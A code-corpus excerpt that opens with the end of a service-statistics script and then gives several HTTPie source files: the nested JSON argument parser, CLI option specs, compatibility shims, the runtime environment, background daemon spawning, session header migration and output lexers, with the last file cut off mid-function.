logging.basicConfig(level=logging.WARNING)
data = {
'services': get_services_stats(),
'db': pymysql and args.db_pass and get_db_stats(args.db_host,
args.db_user,
args.db_pass) or [],
'processes': psutil and get_processes_stats(args.process) or [],
'api': get_http_stats(args.apache_log),
'report': get_report_info(),
}
print(json.dumps(data, indent=2))
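# Illustration (added, not part of the upstream script): what the combined-log
# parser above extracts from one access-log line such as
#
#   10.0.0.1 - - [01/Jan/2024:00:00:00 +0000]
#       "GET /identity/v3/auth/tokens HTTP/1.1" 201 7015 "-" "python-keystoneclient"
#
# get_http_stats_for_log() on a file holding that line would return:
#   [{'service': 'identity', 'log': '<logfile name>',
#     'largest': 7015, 'keystoneclient-GET': 1}]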
``` |
{
"source": "10088/httpie",
"score": 2
} |
#### File: httpie/cli/nested_json.py
```python
from enum import Enum, auto
from typing import (
Any,
Iterator,
NamedTuple,
Optional,
List,
NoReturn,
Type,
Union,
)
from httpie.cli.dicts import NestedJSONArray
from httpie.cli.constants import EMPTY_STRING, OPEN_BRACKET, CLOSE_BRACKET, BACKSLASH, HIGHLIGHTER
class HTTPieSyntaxError(ValueError):
def __init__(
self,
source: str,
token: Optional['Token'],
message: str,
message_kind: str = 'Syntax',
) -> None:
self.source = source
self.token = token
self.message = message
self.message_kind = message_kind
def __str__(self):
lines = [f'HTTPie {self.message_kind} Error: {self.message}']
if self.token is not None:
lines.append(self.source)
lines.append(
' ' * (self.token.start)
+ HIGHLIGHTER * (self.token.end - self.token.start)
)
return '\n'.join(lines)
class TokenKind(Enum):
TEXT = auto()
NUMBER = auto()
LEFT_BRACKET = auto()
RIGHT_BRACKET = auto()
def to_name(self) -> str:
for key, value in OPERATORS.items():
if value is self:
return repr(key)
else:
return 'a ' + self.name.lower()
OPERATORS = {OPEN_BRACKET: TokenKind.LEFT_BRACKET, CLOSE_BRACKET: TokenKind.RIGHT_BRACKET}
SPECIAL_CHARS = OPERATORS.keys() | {BACKSLASH}
LITERAL_TOKENS = [TokenKind.TEXT, TokenKind.NUMBER]
class Token(NamedTuple):
kind: TokenKind
value: Union[str, int]
start: int
end: int
def assert_cant_happen() -> NoReturn:
raise ValueError('Unexpected value')
def check_escaped_int(value: str) -> str:
if not value.startswith(BACKSLASH):
raise ValueError('Not an escaped int')
try:
int(value[1:])
except ValueError as exc:
raise ValueError('Not an escaped int') from exc
else:
return value[1:]
def tokenize(source: str) -> Iterator[Token]:
cursor = 0
backslashes = 0
buffer = []
def send_buffer() -> Iterator[Token]:
nonlocal backslashes
if not buffer:
return None
value = ''.join(buffer)
kind = TokenKind.TEXT
if not backslashes:
for variation, kind in [
(int, TokenKind.NUMBER),
(check_escaped_int, TokenKind.TEXT),
]:
try:
value = variation(value)
except ValueError:
continue
else:
break
yield Token(
kind, value, start=cursor - (len(buffer) + backslashes), end=cursor
)
buffer.clear()
backslashes = 0
def can_advance() -> bool:
return cursor < len(source)
while can_advance():
index = source[cursor]
if index in OPERATORS:
yield from send_buffer()
yield Token(OPERATORS[index], index, cursor, cursor + 1)
elif index == BACKSLASH and can_advance():
if source[cursor + 1] in SPECIAL_CHARS:
backslashes += 1
else:
buffer.append(index)
buffer.append(source[cursor + 1])
cursor += 1
else:
buffer.append(index)
cursor += 1
yield from send_buffer()
class PathAction(Enum):
KEY = auto()
INDEX = auto()
APPEND = auto()
# Pseudo action, used by the interpreter
SET = auto()
def to_string(self) -> str:
return self.name.lower()
class Path:
def __init__(
self,
kind: PathAction,
accessor: Optional[Union[str, int]] = None,
tokens: Optional[List[Token]] = None,
is_root: bool = False,
):
self.kind = kind
self.accessor = accessor
self.tokens = tokens or []
self.is_root = is_root
def reconstruct(self) -> str:
if self.kind is PathAction.KEY:
if self.is_root:
return str(self.accessor)
return OPEN_BRACKET + self.accessor + CLOSE_BRACKET
elif self.kind is PathAction.INDEX:
return OPEN_BRACKET + str(self.accessor) + CLOSE_BRACKET
elif self.kind is PathAction.APPEND:
return OPEN_BRACKET + CLOSE_BRACKET
else:
assert_cant_happen()
def parse(source: str) -> Iterator[Path]:
"""
start: root_path path*
root_path: (literal | index_path | append_path)
literal: TEXT | NUMBER
path:
key_path
| index_path
| append_path
key_path: LEFT_BRACKET TEXT RIGHT_BRACKET
index_path: LEFT_BRACKET NUMBER RIGHT_BRACKET
append_path: LEFT_BRACKET RIGHT_BRACKET
"""
tokens = list(tokenize(source))
cursor = 0
def can_advance():
return cursor < len(tokens)
def expect(*kinds):
nonlocal cursor
assert len(kinds) > 0
if can_advance():
token = tokens[cursor]
cursor += 1
if token.kind in kinds:
return token
elif tokens:
token = tokens[-1]._replace(
start=tokens[-1].end + 0, end=tokens[-1].end + 1
)
else:
token = None
if len(kinds) == 1:
suffix = kinds[0].to_name()
else:
suffix = ', '.join(kind.to_name() for kind in kinds[:-1])
suffix += ' or ' + kinds[-1].to_name()
message = f'Expecting {suffix}'
raise HTTPieSyntaxError(source, token, message)
def parse_root():
tokens = []
if not can_advance():
return Path(
PathAction.KEY,
EMPTY_STRING,
is_root=True
)
# (literal | index_path | append_path)?
token = expect(*LITERAL_TOKENS, TokenKind.LEFT_BRACKET)
tokens.append(token)
if token.kind in LITERAL_TOKENS:
action = PathAction.KEY
value = str(token.value)
elif token.kind is TokenKind.LEFT_BRACKET:
token = expect(TokenKind.NUMBER, TokenKind.RIGHT_BRACKET)
tokens.append(token)
if token.kind is TokenKind.NUMBER:
action = PathAction.INDEX
value = token.value
tokens.append(expect(TokenKind.RIGHT_BRACKET))
elif token.kind is TokenKind.RIGHT_BRACKET:
action = PathAction.APPEND
value = None
else:
assert_cant_happen()
else:
assert_cant_happen()
return Path(
action,
value,
tokens=tokens,
is_root=True
)
yield parse_root()
# path*
while can_advance():
path_tokens = []
path_tokens.append(expect(TokenKind.LEFT_BRACKET))
token = expect(
TokenKind.TEXT, TokenKind.NUMBER, TokenKind.RIGHT_BRACKET
)
path_tokens.append(token)
if token.kind is TokenKind.RIGHT_BRACKET:
path = Path(PathAction.APPEND, tokens=path_tokens)
elif token.kind is TokenKind.TEXT:
path = Path(PathAction.KEY, token.value, tokens=path_tokens)
path_tokens.append(expect(TokenKind.RIGHT_BRACKET))
elif token.kind is TokenKind.NUMBER:
path = Path(PathAction.INDEX, token.value, tokens=path_tokens)
path_tokens.append(expect(TokenKind.RIGHT_BRACKET))
else:
assert_cant_happen()
yield path
JSON_TYPE_MAPPING = {
dict: 'object',
list: 'array',
int: 'number',
float: 'number',
str: 'string',
}
def interpret(context: Any, key: str, value: Any) -> Any:
cursor = context
paths = list(parse(key))
paths.append(Path(PathAction.SET, value))
def type_check(index: int, path: Path, expected_type: Type[Any]) -> None:
if not isinstance(cursor, expected_type):
if path.tokens:
pseudo_token = Token(
None, None, path.tokens[0].start, path.tokens[-1].end
)
else:
pseudo_token = None
cursor_type = JSON_TYPE_MAPPING.get(
type(cursor), type(cursor).__name__
)
required_type = JSON_TYPE_MAPPING[expected_type]
message = f"Can't perform {path.kind.to_string()!r} based access on "
message += repr(
''.join(path.reconstruct() for path in paths[:index])
)
message += (
f' which has a type of {cursor_type!r} but this operation'
)
message += f' requires a type of {required_type!r}.'
raise HTTPieSyntaxError(
key, pseudo_token, message, message_kind='Type'
)
    def object_for(kind: PathAction) -> Any:
        if kind is PathAction.KEY:
return {}
elif kind in {PathAction.INDEX, PathAction.APPEND}:
return []
else:
assert_cant_happen()
for index, (path, next_path) in enumerate(zip(paths, paths[1:])):
# If there is no context yet, set it.
if cursor is None:
context = cursor = object_for(path.kind)
if path.kind is PathAction.KEY:
type_check(index, path, dict)
if next_path.kind is PathAction.SET:
cursor[path.accessor] = next_path.accessor
break
cursor = cursor.setdefault(
path.accessor, object_for(next_path.kind)
)
elif path.kind is PathAction.INDEX:
type_check(index, path, list)
if path.accessor < 0:
raise HTTPieSyntaxError(
key,
path.tokens[1],
'Negative indexes are not supported.',
message_kind='Value',
)
cursor.extend([None] * (path.accessor - len(cursor) + 1))
if next_path.kind is PathAction.SET:
cursor[path.accessor] = next_path.accessor
break
if cursor[path.accessor] is None:
cursor[path.accessor] = object_for(next_path.kind)
cursor = cursor[path.accessor]
elif path.kind is PathAction.APPEND:
type_check(index, path, list)
if next_path.kind is PathAction.SET:
cursor.append(next_path.accessor)
break
cursor.append(object_for(next_path.kind))
cursor = cursor[-1]
else:
assert_cant_happen()
return context
def wrap_with_dict(context):
if context is None:
return {}
elif isinstance(context, list):
return {EMPTY_STRING: NestedJSONArray(context)}
else:
assert isinstance(context, dict)
return context
def interpret_nested_json(pairs):
context = None
for key, value in pairs:
context = interpret(context, key, value)
return wrap_with_dict(context)
```
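A quick usage sketch for the module above (likely `httpie/cli/nested_json.py`; the import path is an assumption from the surrounding file layout): `interpret_nested_json` folds `(key, value)` pairs into one nested object according to the grammar documented in `parse()`.
```python
# Illustrative sketch; the module path is assumed, not confirmed by the source.
from httpie.cli.nested_json import interpret_nested_json
result = interpret_nested_json([
    ('search[queries][0]', 'http'),  # root key -> key -> index
    ('search[queries][1]', 'pie'),
    ('search[limit]', 10),
])
assert result == {'search': {'queries': ['http', 'pie'], 'limit': 10}}
```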
#### File: httpie/cli/options.py
```python
import argparse
import textwrap
import typing
from dataclasses import dataclass, field
from enum import Enum, auto
from typing import Any, Optional, Dict, List, Tuple, Type, TypeVar
from httpie.cli.argparser import HTTPieArgumentParser
from httpie.cli.utils import Manual, LazyChoices
class Qualifiers(Enum):
OPTIONAL = auto()
ZERO_OR_MORE = auto()
ONE_OR_MORE = auto()
SUPPRESS = auto()
def map_qualifiers(
configuration: Dict[str, Any], qualifier_map: Dict[Qualifiers, Any]
) -> Dict[str, Any]:
return {
key: qualifier_map[value] if isinstance(value, Qualifiers) else value
for key, value in configuration.items()
}
def drop_keys(
configuration: Dict[str, Any], key_blacklist: Tuple[str, ...]
):
return {
key: value
for key, value in configuration.items()
if key not in key_blacklist
}
PARSER_SPEC_VERSION = '0.0.1a0'
@dataclass
class ParserSpec:
program: str
description: Optional[str] = None
epilog: Optional[str] = None
groups: List['Group'] = field(default_factory=list)
man_page_hint: Optional[str] = None
source_file: Optional[str] = None
def finalize(self) -> 'ParserSpec':
if self.description:
self.description = textwrap.dedent(self.description)
if self.epilog:
self.epilog = textwrap.dedent(self.epilog)
for group in self.groups:
group.finalize()
return self
def add_group(self, name: str, **kwargs) -> 'Group':
group = Group(name, **kwargs)
self.groups.append(group)
return group
def serialize(self) -> Dict[str, Any]:
return {
'name': self.program,
'description': self.description,
'groups': [group.serialize() for group in self.groups],
}
@dataclass
class Group:
name: str
description: str = ''
is_mutually_exclusive: bool = False
arguments: List['Argument'] = field(default_factory=list)
def finalize(self) -> None:
if self.description:
self.description = textwrap.dedent(self.description)
def add_argument(self, *args, **kwargs):
argument = Argument(list(args), kwargs.copy())
argument.post_init()
self.arguments.append(argument)
return argument
def serialize(self) -> Dict[str, Any]:
return {
'name': self.name,
'description': self.description or None,
'is_mutually_exclusive': self.is_mutually_exclusive,
'args': [argument.serialize() for argument in self.arguments],
}
class Argument(typing.NamedTuple):
aliases: List[str]
configuration: Dict[str, Any]
def post_init(self):
"""Run a bunch of post-init hooks."""
# If there is a short help, then create the longer version from it.
short_help = self.configuration.get('short_help')
if (
short_help
and 'help' not in self.configuration
and self.configuration.get('action') != 'lazy_choices'
):
self.configuration['help'] = f'\n{short_help}\n\n'
def serialize(self, *, isolation_mode: bool = False) -> Dict[str, Any]:
configuration = self.configuration.copy()
# Unpack the dynamically computed choices, since we
# will need to store the actual values somewhere.
action = configuration.pop('action', None)
short_help = configuration.pop('short_help', None)
nested_options = configuration.pop('nested_options', None)
if action == 'lazy_choices':
choices = LazyChoices(
self.aliases,
**{'dest': None, **configuration},
isolation_mode=isolation_mode
)
configuration['choices'] = list(choices.load())
configuration['help'] = choices.help
result = {}
if self.aliases:
result['options'] = self.aliases.copy()
else:
result['options'] = [configuration['metavar']]
result['is_positional'] = True
qualifiers = JSON_QUALIFIER_TO_OPTIONS[configuration.get('nargs', Qualifiers.SUPPRESS)]
result.update(qualifiers)
description = configuration.get('help')
if description and description is not Qualifiers.SUPPRESS:
result['short_description'] = short_help
result['description'] = description
if nested_options:
result['nested_options'] = nested_options
python_type = configuration.get('type')
if python_type is not None:
if hasattr(python_type, '__name__'):
type_name = python_type.__name__
else:
type_name = type(python_type).__name__
result['python_type_name'] = type_name
result.update({
key: value
for key, value in configuration.items()
if key in JSON_DIRECT_MIRROR_OPTIONS
if value is not Qualifiers.SUPPRESS
})
return result
@property
def is_positional(self):
return len(self.aliases) == 0
@property
def is_hidden(self):
return self.configuration.get('help') is Qualifiers.SUPPRESS
def __getattr__(self, attribute_name):
if attribute_name in self.configuration:
return self.configuration[attribute_name]
else:
raise AttributeError(attribute_name)
ParserType = TypeVar('ParserType', bound=Type[argparse.ArgumentParser])
ARGPARSE_QUALIFIER_MAP = {
Qualifiers.OPTIONAL: argparse.OPTIONAL,
Qualifiers.SUPPRESS: argparse.SUPPRESS,
Qualifiers.ZERO_OR_MORE: argparse.ZERO_OR_MORE,
Qualifiers.ONE_OR_MORE: argparse.ONE_OR_MORE
}
ARGPARSE_IGNORE_KEYS = ('short_help', 'nested_options')
def to_argparse(
abstract_options: ParserSpec,
parser_type: ParserType = HTTPieArgumentParser,
) -> ParserType:
concrete_parser = parser_type(
prog=abstract_options.program,
description=abstract_options.description,
epilog=abstract_options.epilog,
)
concrete_parser.spec = abstract_options
concrete_parser.register('action', 'lazy_choices', LazyChoices)
concrete_parser.register('action', 'manual', Manual)
for abstract_group in abstract_options.groups:
concrete_group = concrete_parser.add_argument_group(
title=abstract_group.name, description=abstract_group.description
)
if abstract_group.is_mutually_exclusive:
concrete_group = concrete_group.add_mutually_exclusive_group(required=False)
for abstract_argument in abstract_group.arguments:
concrete_group.add_argument(
*abstract_argument.aliases,
**drop_keys(map_qualifiers(
abstract_argument.configuration, ARGPARSE_QUALIFIER_MAP
), ARGPARSE_IGNORE_KEYS)
)
return concrete_parser
JSON_DIRECT_MIRROR_OPTIONS = (
'choices',
'metavar'
)
JSON_QUALIFIER_TO_OPTIONS = {
Qualifiers.OPTIONAL: {'is_optional': True},
Qualifiers.ZERO_OR_MORE: {'is_optional': True, 'is_variadic': True},
Qualifiers.ONE_OR_MORE: {'is_optional': False, 'is_variadic': True},
Qualifiers.SUPPRESS: {}
}
def to_data(abstract_options: ParserSpec) -> Dict[str, Any]:
return {'version': PARSER_SPEC_VERSION, 'spec': abstract_options.serialize()}
def parser_to_parser_spec(parser: argparse.ArgumentParser, **kwargs) -> ParserSpec:
"""Take an existing argparse parser, and create a spec from it."""
return ParserSpec(
program=parser.prog,
description=parser.description,
epilog=parser.epilog,
**kwargs
)
```
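A minimal sketch of the spec-to-parser pipeline above, not HTTPie's real option tree. A plain `argparse.ArgumentParser` is passed as `parser_type` so the example does not depend on `HTTPieArgumentParser`'s extended `parse_args()` signature.
```python
import argparse
# Build an abstract spec, then materialize it both as a parser and as data.
spec = ParserSpec('demo', description='Demo parser.', epilog='See the docs.')
group = spec.add_group('General')
group.add_argument('--verbose', action='store_true', short_help='Verbose output.')
parser = to_argparse(spec.finalize(), parser_type=argparse.ArgumentParser)
args = parser.parse_args(['--verbose'])   # Namespace(verbose=True)
payload = to_data(spec)                   # JSON-friendly description of the CLI
```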
#### File: httpie/httpie/compat.py
```python
import sys
from typing import Any, Optional, Iterable
from httpie.cookies import HTTPieCookiePolicy
from http import cookiejar # noqa
# Request does not carry the original policy attached to the
# cookie jar, so until it is resolved we change the global cookie
# policy. <https://github.com/psf/requests/issues/5449>
cookiejar.DefaultCookiePolicy = HTTPieCookiePolicy
is_windows = 'win32' in str(sys.platform).lower()
is_frozen = getattr(sys, 'frozen', False)
MIN_SUPPORTED_PY_VERSION = (3, 7)
MAX_SUPPORTED_PY_VERSION = (3, 11)
try:
from functools import cached_property
except ImportError:
# Can be removed once we drop Python <3.8 support.
# Taken from `django.utils.functional.cached_property`.
class cached_property:
"""
Decorator that converts a method with a single self argument into a
property cached on the instance.
A cached property can be made out of an existing method:
(e.g. ``url = cached_property(get_absolute_url)``).
The optional ``name`` argument is obsolete as of Python 3.6 and will be
deprecated in Django 4.0 (#30127).
"""
name = None
@staticmethod
def func(instance):
raise TypeError(
'Cannot use cached_property instance without calling '
'__set_name__() on it.'
)
def __init__(self, func, name=None):
self.real_func = func
self.__doc__ = getattr(func, '__doc__')
def __set_name__(self, owner, name):
if self.name is None:
self.name = name
self.func = self.real_func
elif name != self.name:
raise TypeError(
"Cannot assign the same cached_property to two different names "
"(%r and %r)." % (self.name, name)
)
def __get__(self, instance, cls=None):
"""
Call the function and put the return value in instance.__dict__ so that
subsequent attribute access on the instance returns the cached value
instead of calling cached_property.__get__().
"""
if instance is None:
return self
res = instance.__dict__[self.name] = self.func(instance)
return res
# importlib_metadata was a provisional module, so the APIs changed quite a few times
# between 3.8-3.10. It was also not included in the standard library until 3.8, so
# we install the backport for <3.8.
if sys.version_info >= (3, 8):
import importlib.metadata as importlib_metadata
else:
import importlib_metadata
def find_entry_points(entry_points: Any, group: str) -> Iterable[importlib_metadata.EntryPoint]:
if hasattr(entry_points, "select"): # Python 3.10+ / importlib_metadata >= 3.9.0
return entry_points.select(group=group)
else:
return set(entry_points.get(group, ()))
def get_dist_name(entry_point: importlib_metadata.EntryPoint) -> Optional[str]:
dist = getattr(entry_point, "dist", None)
if dist is not None: # Python 3.10+
return dist.name
match = entry_point.pattern.match(entry_point.value)
if not (match and match.group('module')):
return None
package = match.group('module').split('.')[0]
try:
metadata = importlib_metadata.metadata(package)
except importlib_metadata.PackageNotFoundError:
return None
else:
return metadata.get('name')
```
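A sketch of the compatibility helpers above. The entry-point group name is an assumption (HTTPie registers auth plugins under a group of roughly this shape); the helpers themselves are exactly those defined in the file.
```python
# Enumerate plugins under an entry-point group across the importlib.metadata
# API variants handled above. The group name is an assumption.
eps = importlib_metadata.entry_points()
for ep in find_entry_points(eps, group='httpie.plugins.auth.v1'):
    print(ep.name, '->', get_dist_name(ep))
```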
#### File: httpie/httpie/context.py
```python
import argparse
import sys
import os
import warnings
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator, IO, Optional, TYPE_CHECKING
from enum import Enum
try:
import curses
except ImportError:
curses = None # Compiled w/o curses
from .compat import is_windows, cached_property
from .config import DEFAULT_CONFIG_DIR, Config, ConfigFileError
from .encoding import UTF8
from .utils import repr_dict
from .output.ui.palette import GenericColor
if TYPE_CHECKING:
from rich.console import Console
class LogLevel(str, Enum):
INFO = 'info'
WARNING = 'warning'
ERROR = 'error'
LOG_LEVEL_COLORS = {
LogLevel.INFO: GenericColor.PINK,
LogLevel.WARNING: GenericColor.ORANGE,
LogLevel.ERROR: GenericColor.RED,
}
LOG_LEVEL_DISPLAY_THRESHOLDS = {
LogLevel.INFO: 1,
LogLevel.WARNING: 2,
LogLevel.ERROR: float('inf'), # Never hide errors.
}
class Environment:
"""
Information about the execution context
(standard streams, config directory, etc).
By default, it represents the actual environment.
All of the attributes can be overwritten though, which
is used by the test suite to simulate various scenarios.
"""
args = argparse.Namespace()
is_windows: bool = is_windows
config_dir: Path = DEFAULT_CONFIG_DIR
stdin: Optional[IO] = sys.stdin # `None` when closed fd (#791)
stdin_isatty: bool = stdin.isatty() if stdin else False
stdin_encoding: str = None
stdout: IO = sys.stdout
stdout_isatty: bool = stdout.isatty()
stdout_encoding: str = None
stderr: IO = sys.stderr
stderr_isatty: bool = stderr.isatty()
colors = 256
program_name: str = 'http'
# Whether to show progress bars / status spinners etc.
show_displays: bool = True
if not is_windows:
if curses:
try:
curses.setupterm()
colors = curses.tigetnum('colors')
except curses.error:
pass
else:
# noinspection PyUnresolvedReferences
import colorama.initialise
stdout = colorama.initialise.wrap_stream(
stdout, convert=None, strip=None,
autoreset=True, wrap=True
)
stderr = colorama.initialise.wrap_stream(
stderr, convert=None, strip=None,
autoreset=True, wrap=True
)
del colorama
def __init__(self, devnull=None, **kwargs):
"""
Use keyword arguments to overwrite
any of the class attributes for this instance.
"""
assert all(hasattr(type(self), attr) for attr in kwargs.keys())
self.__dict__.update(**kwargs)
# The original STDERR unaffected by --quiet’ing.
self._orig_stderr = self.stderr
self._devnull = devnull
# Keyword arguments > stream.encoding > default UTF-8
if self.stdin and self.stdin_encoding is None:
self.stdin_encoding = getattr(
self.stdin, 'encoding', None) or UTF8
if self.stdout_encoding is None:
actual_stdout = self.stdout
if is_windows:
# noinspection PyUnresolvedReferences
from colorama import AnsiToWin32
if isinstance(self.stdout, AnsiToWin32):
# noinspection PyUnresolvedReferences
actual_stdout = self.stdout.wrapped
self.stdout_encoding = getattr(
actual_stdout, 'encoding', None) or UTF8
self.quiet = kwargs.pop('quiet', 0)
def __str__(self):
defaults = dict(type(self).__dict__)
actual = dict(defaults)
actual.update(self.__dict__)
actual['config'] = self.config
return repr_dict({
key: value
for key, value in actual.items()
if not key.startswith('_')
})
def __repr__(self):
return f'<{type(self).__name__} {self}>'
_config: Config = None
@property
def config(self) -> Config:
config = self._config
if not config:
self._config = config = Config(directory=self.config_dir)
if not config.is_new():
try:
config.load()
except ConfigFileError as e:
self.log_error(e, level='warning')
return config
@property
def devnull(self) -> IO:
if self._devnull is None:
self._devnull = open(os.devnull, 'w+')
return self._devnull
@contextmanager
def as_silent(self) -> Iterator[None]:
original_stdout = self.stdout
original_stderr = self.stderr
try:
self.stdout = self.devnull
self.stderr = self.devnull
yield
finally:
self.stdout = original_stdout
self.stderr = original_stderr
def log_error(self, msg: str, level: LogLevel = LogLevel.ERROR) -> None:
if self.stdout_isatty and self.quiet >= LOG_LEVEL_DISPLAY_THRESHOLDS[level]:
stderr = self.stderr # Not directly /dev/null, since stderr might be mocked
else:
stderr = self._orig_stderr
rich_console = self._make_rich_console(file=stderr, force_terminal=stderr.isatty())
rich_console.print(
f'\n{self.program_name}: {level}: {msg}\n\n',
style=LOG_LEVEL_COLORS[level],
markup=False,
highlight=False,
soft_wrap=True
)
def apply_warnings_filter(self) -> None:
if self.quiet >= LOG_LEVEL_DISPLAY_THRESHOLDS[LogLevel.WARNING]:
warnings.simplefilter("ignore")
def _make_rich_console(
self,
file: IO[str],
force_terminal: bool
) -> 'Console':
from rich.console import Console
from httpie.output.ui.rich_palette import _make_rich_color_theme
style = getattr(self.args, 'style', None)
theme = _make_rich_color_theme(style)
# Rich infers the rest of the knowledge (e.g encoding)
# dynamically by looking at the file/stderr.
return Console(
file=file,
force_terminal=force_terminal,
no_color=(self.colors == 0),
theme=theme
)
# Rich recommends separating the actual console (stdout) from
# the error (stderr) console for better isolation between parts.
# https://rich.readthedocs.io/en/stable/console.html#error-console
@cached_property
def rich_console(self):
return self._make_rich_console(self.stdout, self.stdout_isatty)
@cached_property
def rich_error_console(self):
return self._make_rich_console(self.stderr, self.stderr_isatty)
```
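A test-style sketch of the override mechanism the class docstring describes: every class attribute can be replaced per instance via keyword arguments, which is how the test suite simulates different terminals.
```python
import io
env = Environment(stdout=io.StringIO(), stderr=io.StringIO(), stdin=None)
env.log_error('config file is malformed', level=LogLevel.WARNING)
with env.as_silent():
    env.stdout.write('discarded')  # both streams point at devnull here
print(env.stderr.getvalue())       # the formatted warning ends up here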
#### File: httpie/internal/daemons.py
```python
import inspect
import os
import platform
import sys
import httpie.__main__
from contextlib import suppress
from subprocess import Popen, DEVNULL
from typing import Dict, List
from httpie.compat import is_frozen, is_windows
ProcessContext = Dict[str, str]
def _start_process(cmd: List[str], **kwargs) -> Popen:
prefix = [sys.executable]
# If it is frozen, sys.executable points to the binary (http).
# Otherwise it points to the python interpreter.
if not is_frozen:
main_entrypoint = httpie.__main__.__file__
prefix += [main_entrypoint]
return Popen(prefix + cmd, close_fds=True, shell=False, stdout=DEVNULL, stderr=DEVNULL, **kwargs)
def _spawn_windows(cmd: List[str], process_context: ProcessContext) -> None:
from subprocess import (
CREATE_NEW_PROCESS_GROUP,
CREATE_NO_WINDOW,
STARTF_USESHOWWINDOW,
STARTUPINFO,
)
# https://stackoverflow.com/a/7006424
# https://bugs.python.org/issue41619
creationflags = CREATE_NEW_PROCESS_GROUP | CREATE_NO_WINDOW
startupinfo = STARTUPINFO()
startupinfo.dwFlags |= STARTF_USESHOWWINDOW
_start_process(
cmd,
env=process_context,
creationflags=creationflags,
startupinfo=startupinfo,
)
def _spawn_posix(args: List[str], process_context: ProcessContext) -> None:
"""
    Perform a double fork procedure [1] to detach from the parent
process so that we don't block the user even if their original
command's execution is done but the release fetcher is not.
[1]: https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap11.html#tag_11_01_03
"""
from httpie.core import main
try:
pid = os.fork()
if pid > 0:
return
except OSError:
os._exit(1)
os.setsid()
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
os._exit(1)
# Close all standard inputs/outputs
sys.stdin.close()
sys.stdout.close()
sys.stderr.close()
if platform.system() == 'Darwin':
# Double-fork is not reliable on MacOS, so we'll use a subprocess
# to ensure the task is isolated properly.
process = _start_process(args, env=process_context)
# Unlike windows, since we already completed the fork procedure
# we can simply join the process and wait for it.
process.communicate()
else:
os.environ.update(process_context)
with suppress(BaseException):
main(['http'] + args)
os._exit(0)
def _spawn(args: List[str], process_context: ProcessContext) -> None:
"""
Spawn a new process to run the given command.
"""
if is_windows:
_spawn_windows(args, process_context)
else:
_spawn_posix(args, process_context)
def spawn_daemon(task: str) -> None:
args = [task, '--daemon']
process_context = os.environ.copy()
if not is_frozen:
file_path = os.path.abspath(inspect.stack()[0][1])
process_context['PYTHONPATH'] = os.path.dirname(
os.path.dirname(os.path.dirname(file_path))
)
_spawn(args, process_context)
```
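A hypothetical call site for the daemon machinery above; in HTTPie this mechanism backs the background update fetcher, but the task name below is illustrative only.
```python
spawn_daemon('fetch_updates')  # task name is an assumption, not a contract
```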
#### File: httpie/legacy/v3_2_0_session_header_format.py
```python
from typing import Any, Type, List, Dict, TYPE_CHECKING
if TYPE_CHECKING:
from httpie.sessions import Session
OLD_HEADER_STORE_WARNING = '''\
Outdated layout detected for the current session. Please consider updating it,
in order to use the latest features regarding the header layout.
For fixing the current session:
$ httpie cli sessions upgrade {hostname} {session_id}
'''
OLD_HEADER_STORE_WARNING_FOR_NAMED_SESSIONS = '''\
For fixing all named sessions:
$ httpie cli sessions upgrade-all
'''
OLD_HEADER_STORE_LINK = '\nSee $INSERT_LINK for more information.'
def pre_process(session: 'Session', headers: Any) -> List[Dict[str, Any]]:
"""Serialize the headers into a unified form and issue a warning if
the session file is using the old layout."""
is_old_style = isinstance(headers, dict)
if is_old_style:
normalized_headers = list(headers.items())
else:
normalized_headers = [
(item['name'], item['value'])
for item in headers
]
if is_old_style:
warning = OLD_HEADER_STORE_WARNING.format(hostname=session.bound_host, session_id=session.session_id)
if not session.is_anonymous:
warning += OLD_HEADER_STORE_WARNING_FOR_NAMED_SESSIONS
warning += OLD_HEADER_STORE_LINK
session.warn_legacy_usage(warning)
return normalized_headers
def post_process(
normalized_headers: List[Dict[str, Any]],
*,
original_type: Type[Any]
) -> Any:
"""Deserialize given header store into the original form it was
used in."""
if issubclass(original_type, dict):
# For the legacy behavior, preserve the last value.
return {
item['name']: item['value']
for item in normalized_headers
}
else:
return normalized_headers
def fix_layout(session: 'Session', *args, **kwargs) -> None:
from httpie.sessions import materialize_headers
if not isinstance(session['headers'], dict):
return None
session['headers'] = materialize_headers(session['headers'])
```
#### File: output/lexers/common.py
```python
def precise(lexer, precise_token, parent_token):
    # Due to a pygments bug [0], custom tokens will look bad
# on outside styles. Until it is fixed on upstream, we'll
# convey whether the client is using pie style or not
# through precise option and return more precise tokens
    # depending on its value.
#
# [0]: https://github.com/pygments/pygments/issues/1986
if precise_token is None or not lexer.options.get("precise"):
return parent_token
else:
return precise_token
```
#### File: output/lexers/metadata.py
```python
import pygments
from httpie.models import ELAPSED_TIME_LABEL
from httpie.output.lexers.common import precise
SPEED_TOKENS = {
0.45: pygments.token.Number.SPEED.FAST,
1.00: pygments.token.Number.SPEED.AVG,
2.50: pygments.token.Number.SPEED.SLOW,
}
def speed_based_token(lexer, match, ctx):
try:
value = float(match.group())
except ValueError:
return pygments.token.Number
for limit, token in SPEED_TOKENS.items():
if value <= limit:
break
else:
token = pygments.token.Number.SPEED.VERY_SLOW
response_type = precise(
lexer,
token,
pygments.token.Number
)
yield match.start(), response_type, match.group()
class MetadataLexer(pygments.lexer.RegexLexer):
"""Simple HTTPie metadata lexer."""
tokens = {
'root': [
(
fr'({ELAPSED_TIME_LABEL})( *)(:)( *)(\d+\.\d+)(s)', pygments.lexer.bygroups(
pygments.token.Name.Decorator, # Name
pygments.token.Text,
pygments.token.Operator, # Colon
pygments.token.Text,
speed_based_token,
pygments.token.Name.Builtin # Value
)
),
# Generic item
(
r'(.*?)( *)(:)( *)(.+)', pygments.lexer.bygroups(
pygments.token.Name.Decorator, # Name
pygments.token.Text,
pygments.token.Operator, # Colon
pygments.token.Text,
pygments.token.Text # Value
)
),
]
}
```
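A standalone sketch of the lexer above. It assumes `ELAPSED_TIME_LABEL` renders as `'Elapsed time'`; the value 1.23s then lands in the SLOW bucket of `SPEED_TOKENS`.
```python
import pygments.formatters
print(pygments.highlight('Elapsed time: 1.23s',
                         MetadataLexer(precise=True),
                         pygments.formatters.TerminalFormatter()))
```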
#### File: output/ui/man_pages.py
```python
import subprocess
import os
from httpie.context import Environment
MAN_COMMAND = 'man'
NO_MAN_PAGES = os.getenv('HTTPIE_NO_MAN_PAGES', False)
# On some systems, HTTP(n) might exist but we are only
# interested in HTTP(1).
#
# For more information on man page sections: https://unix.stackexchange.com/a/138643
MAN_PAGE_SECTION = '1'
def is_available(program: str) -> bool:
"""Check whether HTTPie's man pages are available in this system."""
    if NO_MAN_PAGES or os.name == 'nt':
return False
try:
process = subprocess.run(
